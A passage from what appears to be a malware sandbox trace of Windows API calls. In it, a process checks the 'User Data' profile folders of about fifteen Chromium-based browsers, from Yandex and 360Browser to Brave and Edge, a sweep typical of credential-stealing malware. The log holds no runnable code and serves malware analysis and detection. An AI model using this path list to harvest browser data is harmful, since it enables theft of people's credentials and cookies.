lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User\\User Data") returned 0x39 [0279.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.917] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User\\User Data", lpFilePart=0x0) returned 0x38 [0279.918] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User\\User Data\\", lpFilePart=0x0) returned 0x39 [0279.918] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\amigo\\user\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.920] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.920] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Torch\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data") returned 0x34 [0279.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.920] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data", lpFilePart=0x0) returned 0x33 [0279.921] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\", lpFilePart=0x0) returned 0x34 [0279.921] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\torch\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.923] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.923] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data") returned 0x43 [0279.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.923] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpFilePart=0x0) returned 0x42 [0279.923] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\", lpFilePart=0x0) returned 0x43 [0279.924] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\yandex\\yandexbrowser\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.926] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.926] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\User Data") returned 0x35 [0279.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.926] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\User Data", lpFilePart=0x0) returned 0x34 [0279.926] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\User Data\\", lpFilePart=0x0) returned 0x35 [0279.926] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comodo\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.928] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.928] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\360Browser\\Browser\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data") returned 0x41 [0279.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.929] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data", lpFilePart=0x0) returned 0x40 [0279.929] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\", lpFilePart=0x0) returned 0x41 [0279.929] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\360browser\\browser\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.933] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.933] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Maxthon3\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon3\\User Data") returned 0x37 [0279.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.933] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon3\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon3\\User Data", lpFilePart=0x0) returned 0x36 [0279.933] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon3\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon3\\User Data\\", lpFilePart=0x0) returned 0x37 [0279.933] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon3\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\maxthon3\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.938] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.938] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\K-Melon\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\K-Melon\\User Data") returned 0x36 [0279.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.938] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\K-Melon\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\K-Melon\\User Data", lpFilePart=0x0) returned 0x35 [0279.938] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\K-Melon\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\K-Melon\\User Data\\", lpFilePart=0x0) returned 0x36 [0279.938] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\K-Melon\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\k-melon\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.939] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.939] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data") returned 0x3e [0279.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.940] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpFilePart=0x0) returned 0x3d [0279.940] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\", lpFilePart=0x0) returned 0x3e [0279.940] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\sputnik\\sputnik\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.941] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.941] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Nichrome\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data") returned 0x37 [0279.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.942] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data", lpFilePart=0x0) returned 0x36 [0279.942] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\", lpFilePart=0x0) returned 0x37 [0279.942] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\nichrome\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.943] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.943] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CocCoc\\Browser\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data") returned 0x3d [0279.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.944] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data", lpFilePart=0x0) returned 0x3c [0279.944] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\", lpFilePart=0x0) returned 0x3d [0279.944] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coccoc\\browser\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.945] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.945] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Uran\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Uran\\User Data") returned 0x33 [0279.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.946] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Uran\\User Data", lpFilePart=0x0) returned 0x32 [0279.946] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Uran\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Uran\\User Data\\", lpFilePart=0x0) returned 0x33 [0279.946] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Uran\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\uran\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.947] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.947] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromodo\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromodo\\User Data") returned 0x37 [0279.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.947] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromodo\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromodo\\User Data", lpFilePart=0x0) returned 0x36 [0279.947] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromodo\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromodo\\User Data\\", lpFilePart=0x0) returned 0x37 [0279.948] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromodo\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chromodo\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.949] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.949] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mail.Ru\\Atom\\User Data") returned 0x3b [0279.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.949] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mail.Ru\\Atom\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpFilePart=0x0) returned 0x3a [0279.949] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mail.Ru\\Atom\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mail.Ru\\Atom\\User Data\\", lpFilePart=0x0) returned 0x3b [0279.949] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mail.Ru\\Atom\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\mail.ru\\atom\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.951] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.951] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data") returned 0x4a [0279.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.951] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpFilePart=0x0) returned 0x49 [0279.951] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\", lpFilePart=0x0) returned 0x4a [0279.951] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\bravesoftware\\brave-browser\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.953] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.953] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Microsoft\\Edge\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data") returned 0x3d [0279.953] 